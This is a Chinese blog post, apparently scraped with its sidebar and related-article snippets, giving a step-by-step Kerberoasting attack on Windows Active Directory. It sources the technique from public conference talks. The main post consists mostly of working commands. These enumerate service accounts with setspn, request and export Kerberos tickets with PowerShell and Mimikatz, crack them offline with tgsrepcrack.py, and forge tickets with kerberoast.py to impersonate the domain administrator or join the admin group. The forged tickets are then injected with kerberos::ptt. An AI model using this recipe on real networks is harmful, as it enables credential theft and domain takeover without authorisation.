- 浏览: 278661 次
文章分类
- 全部博客 (276)
- burp+hydra暴力破解 (1)
- kali linux工具集 (6)
- kali (59)
- linux (54)
- password (14)
- web (63)
- 渗透测试 (50)
- windows (40)
- metasploit (9)
- 信息收集 (32)
- burp suit (4)
- 安全审计 (9)
- https://github.com/secretsquirrel/the-backdoor-factory (0)
- nmap (4)
- arachni (2)
- 工具 (5)
- sql (3)
- 网络 (2)
- 后渗透测试 (10)
- 内网 (5)
- 无线 (2)
- C (3)
- bios (1)
- RoR (12)
- mongodb (1)
- linxu (1)
- gdb (1)
- linux,虚拟化 (1)
- python (4)
最新评论
参考:
1. http://securityweekly.com/2014/09/26/derbycon-attacking-kerberos-talk-ill-be-checking-out-and-you-should-too/
2. https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin(1).pdf
3. https://github.com/nidem/kerberoast
方法:
1. 查找服务账户
2. 识别user账户,忽略机器账户,通常机器账户密码不太容易破解
3. 获得ticket
原型是:
4. 使用Mimikatz从RAM中获得tickets
5. 离线破解服务口令
6. 将user伪装成另一个user
或者把user加入一个组(本例为admin组)
7. 使用Mimikatz注入内存
1. http://securityweekly.com/2014/09/26/derbycon-attacking-kerberos-talk-ill-be-checking-out-and-you-should-too/
2. https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin(1).pdf
3. https://github.com/nidem/kerberoast
方法:
1. 查找服务账户
setspn -T DOMAINNAME -F -Q */*
2. 识别user账户,忽略机器账户,通常机器账户密码不太容易破解
3. 获得ticket
PS C:\> Add-Type -AssemblyName System.IdentityModel PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"
原型是:
Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -Arguemtlist “HTTP / YOURKERB SERVER”
4. 使用Mimikatz从RAM中获得tickets
mimikatz# kerberos::list /export
5. 离线破解服务口令
tgsrepcrack.py -w wordlist.txt *.kirbi
6. 将user伪装成另一个user
./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -u 500
或者把user加入一个组(本例为admin组)
./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -g 512
7. 使用Mimikatz注入内存
kerberos::ptt sql.kirbi
发表评论
-
[图] windows 10
2015-08-18 20:37 284网上下载的图片,忘了来源 -
windows提权集合
2015-06-30 00:23 541https://blog.netspi.com/5-ways- ... -
[转]Access to every PC and become local Admin
2015-06-29 21:50 508原文地址:http://www.gosecure.it/blo ... -
[转]Top Five Ways SpiderLabs Got Domain Admin on Your Internal Network
2015-06-29 21:46 1474原文地址:https://www.trustwave.com/ ... -
[转]如何获得window管理员权限
2015-06-29 21:21 448引用A tutorial on how to get into ... -
Window提权基本步骤
2015-06-03 22:00 753原文地址: http://www.fuzzysecurity. ... -
[转]malware persistence
2015-05-06 23:46 384原文地址:http://jumpespjump.blogspo ... -
[转]backdoor a windows domain
2015-05-06 22:56 473原文地址:http://jumpespjump.blogspo ... -
[译]解密MSSQL密码
2015-03-26 00:43 2821原文地址: https://blog.ne ... -
[转]badsamba
2015-03-20 00:55 301原文地址:http://blog.gdssecurity.co ... -
[译]使用wireshark解密TLS浏览器流量
2015-03-12 00:57 4032原文地址:https://jimshaver.net/2015 ... -
[转]John the ripper hash format cheetsheet
2015-03-10 01:30 950原文地址:http://pentestmonkey.net/c ... -
window增加硬盘性能方法
2015-02-05 01:03 337参考地址:http://way2h.blogspot.com/ ... -
[译]Skeleton Key Malware & Mimikatz
2015-01-28 20:29 771原文地址: http://adsecurity.org/?p= ... -
绕过PowerShell执行策略的15种方法
2015-01-28 02:27 847https://blog.netspi.com/15-ways ... -
[翻译]oledump: Extracting Embedded EXE From DOC
2015-01-04 22:40 915原文地址:http://blog.didierstevens. ... -
[工具]volatility----Windows内存取证
2015-01-04 22:01 1518下载地址:https://github.com/volatil ... -
[译]Windows提权:ahcache.sys/NtApphelpCacheControl
2015-01-03 21:12 1005原文地址:https://code.google.com/p/ ... -
[译]使用Volatility从memory dump获得密码
2014-12-30 12:27 3739原文地址:https://cyberarms.wordpres ... -
man crunch
2014-12-28 23:35 375http://adaywithtape.blogspot.co ...
相关推荐
Kerberos单点登录概念及技术,可以帮助人们很好利用kerberos来开发单点登录。
Kerberos协议是当今最重要的实用认证协议,但是它也存在着一些局限性和缺陷,文章主要分析了Kerberos协议的两种最重要的攻击:口令攻击和重放攻击,以Windows2000环境下对Kerberos协议进行的攻击为例进行了具体分析...
Kerberos协议是一种计算机网络授权协议,用来在非安全...可以用于防止窃听、防止replay攻击、保护数据完整性等场合,是一种应用对称密钥体制进行密钥管理的系统。Kerberos的扩展产品也使用公开密钥加密方法进行认证。
Kerberos攻击工具包-纯python- 安装 pip3 install kerberoast 前提条件 Python 3.6参见requirements.txt 对于急躁的人 重要说明:LDAP和Kerberos可接受的目标URL格式如下<ldap> : <protocol>+<auth>://<domain>\...
Kerberos这一名词来源于希腊神话“三个头的狗——地狱之门守护者”系统设计上...可以用于防止窃听、防止replay攻击、保护数据完整性等场合,是一种应用对称密钥体制进行密钥管理的系统。文件详细介绍了kerberos原理。
基于无双线性对的无证书隐式认证的Kerberos协议改进,:针对Kerberos认证协议存在的密钥托管,口令攻击和重放攻击等缺陷,将隐式认证与无证 书密钥协商协议结合,提出了一种无双线性对的无证书隐式认证的...
它让你能够将一些标准的安全机制,例如Solaris NIS(网络信息服务)、Windows NT、LDAP(轻量目录存取协议),Kerberos等通过一种通用的,可配置的方式集成到系统中。本文首先向你介绍JAAS验证中的一些核心部分,...
塞贝罗 Kerberos协议攻击者。 在Active Directory渗透测试中执行与Kerberos协议相关的多项任务的工具。安装从板条箱: cargo install cerbero 来自回购: git clone ...
议题分享主要介绍了域渗透中数据保护API架构逻辑和Kerberos认证协议的通信流程,同时从攻击者的角度谈了DPAPI和Kerberos协议的利用,最后给出常见攻击思路的防御和缓解措施。 1.1 DPAPI架构 1.2 DPAPI加密机制 1.3 ...
针对Kerberos单点登录协议存在的口令攻击、重放攻击、密钥需要托管和效率不高等问题,引入一种无对数运算的无证书隐式认证与密钥协商协议对其进行了改进。在随机预言机模型下证明了新协议的强安全性,分析了改进后...
Kerberos协议中离线口令猜测的攻击方法,证明了该协议中存在离线口令猜测缺陷, 并通过以上分析为克服该缺陷提供改进思路。由数字签名在现代电子商务中重要性分 析得出基于公钥体制的Kerberos改进的必要性。
此存储库是针对Windows Active Directory域中针对Kerberos资源的约束委派的实际攻击。 与其他常见实施方式的不同之处在于,我们是从Windows Domain外部发起攻击的,而不是从加入域的计算机(通常是Windows)发起的...
在分析WAP协议族中的无线传输层(WTLS)协议后,指出了其中的匿名认证过程存在中间人攻击的风险。本文将Kerberos认证系统加入到WTLS协议中改进了WTLS协议的安全性,详细设计了该解决方案中涉及的数据结构,并给出了一...
针对Kerberos认证协议存在的密钥托管,口令攻击和重放攻击等缺陷,将隐式认证与无证书密钥协商协议结合,提出了一种无双线性对的无证书隐式认证的Kerberos改进协议,避免了Kerberos协议中第三方对信息的无举证窃听,...
在默认的 Kerberos 设置中,离线字典攻击是可能的(但很困难)。 PAKE 缓解了这一点。 PAKE 不依赖于时钟同步,例如在默认加密时间戳预身份验证机制中使用的时钟同步。 与现有方法一样,PAKE 从不通过网络发送...
此工具可以帮助红色和蓝色团队审核Active Directory用户帐户中的弱,众所周知或容易猜测的Pass Spray-AD,Cobalt Strike工具可以对Active Directory执行快速Kerberos密码喷雾攻击。 此工具可以帮助红色和蓝色团队...
Kerberos协议是一种基于可信第三方的身份认证协议,针对Kerberos协议具有口令猜测攻击、重放攻击等缺陷,提出一种基于DESX算法和SHA函数的Kerberos协议改进方案,通过分析比较,改进协议不但摒弃了原Kerberos协议...
Talon可以使用单个域控制器或多个域控制器来执行这些攻击,从而在域控制器和服务(LDAP或Kerberos)之间随机化每次尝试。 有关该技术的更多信息,请参见以下 用法 从下载适用于您的操作系统的 贡献 Talon是在golang...
该模型能够实现相互认证、抗中间人攻击,具有不可抵赖性。分析结果表明,无论从计算量还是通信量方面,该模型均优于原有的公钥基础设施认证机制,具有较高的安全性且对系统参数无限制,能较好地满足网格的自治性。
到目前为止,这是一个周末项目,也是我第一次涉足 libkrb5 领域,我不保证实现的正确性,也不敢声称该插件没有允许攻击者绕过身份验证的严重缺陷。 这个库是在简化的 BSD 许可下发布的。 有关完整的许可证文本,请...